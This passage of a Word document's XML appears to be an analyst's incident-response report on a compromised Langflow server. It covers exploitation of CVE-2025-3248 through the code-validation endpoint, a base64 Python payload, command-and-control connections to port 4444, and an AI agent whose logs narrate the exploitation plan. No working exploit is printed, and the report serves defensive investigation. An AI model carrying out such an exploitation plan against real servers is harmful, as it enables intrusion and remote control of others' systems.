        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00BAF51D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>POST /api/v1/validate/code HTTP/1.1 200 src=64.20.53.230 ua=python-requests/2.32.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="483ED54C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1ADA6102" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6F8E7FE3" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E8A5BA1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0D1E06AB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent narrates CVE-2025-3248 exploitation plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="52CD1588" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A1496A4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="79BF3915" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5EE909D9" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxProcess_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74EF0A65" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">python3.11 spawned child python3.11 -c &lt;base64 payload&gt; (PID 4471)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5A39BBE3" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="4D63761E" wp14:textId="091AA19A">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Analyst Findings:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="4B94D5A5" wp14:textId="47036C6B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="160" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">With the initial analytics rule that fired on ff-lf-01 because of a service account launching a process it has never launched before, that's when I started digging into the logs. I first had to establish “how the attack started and what was the initial access?” With this question, that is where I started at the syslog table within Sentinel. The query for this included the 4 devices that were affected, and looking for any syslog messages that included “POST”, “GET” “api”, “Validate”, “code”, or “flow”. After running that query through KQL, I found that at 7/30/26 at 19:20, there was a  process from langflow that sent data to the server via "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1/validate/code HTTP/1.1 200 host=langflow.flowforge.io src=64.20.53.230 ua="python-requests/2.32.3". The 200 shows the request was successful and that it specifically hit the Langflow application. I also see that the source is from 64.20.53.230, which would be the attackers machine. I also see a python request, which means this was done by a script, and not anyone clicking around in a browser. All together, the python script ran malicious code to Langflows code validation endpoint and the server freely let it in.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="4E737654" wp14:anchorId="0AA6E51E">
            <wp:extent cx="5943600" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1335865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5865362" name="Picture 1335865362"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1396323131">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2352675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="4A11C47C" w:rsidP="40786FAC" w:rsidRDefault="4A11C47C" w14:paraId="7E6D414B" w14:textId="27A39F2F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="160" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After that, I then checked the LLMAgentLogsCL, since this attack is relatively unique in that the attacker exploited the AI agent to attack the system. With this information, I can see what the attacker and the LLM were thinking through the attack. One of the main weaknesses that the intruder used can be found in the logs, and this shows where the machine agent is seen responding and saying it will abuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-3248, which is a remote execution Vulnerability in Langflow V 1.3.0 and prior. I was also able to collect the SessionID for further investigation.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:br/>
        <w:drawing>
          <wp:inline wp14:editId="2CF16ED1" wp14:anchorId="2C00420E">
            <wp:extent cx="5943600" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1704273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4273591" name="Picture 1704273591"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId630523971">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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lastly for checking initial access, I had to check if there were any processes that were spawned on the server. I went to check the LinuxProcess_CL table, and from there I was able to find attempts of creating python payloads, and a listener being set up on Langflows webserver on port 7860, which is a big red flag, as the web server allowed this to happen without taking actions to deny this.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Nova" w:hAnsi="Arial Nova" w:eastAsia="Arial Nova" w:cs="Arial Nova"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:br/>
        <w:drawing>
          <wp:inline wp14:editId="76A3E65A" wp14:anchorId="343CBDA4">
            <wp:extent cx="5943600" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="240105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0105993" name="Picture 240105993"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1848019097">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2628900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="40786FAC" w:rsidP="40786FAC" w:rsidRDefault="40786FAC" w14:paraId="7FB58FBC" w14:textId="76D7BCE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2. Command and Control</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="39A3F8D2" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T1071.001 — Web Protocols  |  T1053.003 — Cron</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3656B9AB" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="76518B73" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Evidence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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="56196ED2" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="35CD11A1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="5DAC9FE3" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="6AA68EB0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="3647E5E9" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="31612D56" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B47C72D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:22:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29438A64" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="046CBB24" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxNetwork_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31C0B890" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Outbound TCP — 45.131.66.106:4444 (PID 4471) — primary C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="23EF0D56" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3BEE6066" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7F202901" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2BF910E5" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxNetwork_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="344ECBA4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Outbound TCP — 104.16.132.229:8080 — secondary channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="30F98452" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="407C4699" wp14:textId="77777777">
            <w:r>
              <w:rPr>
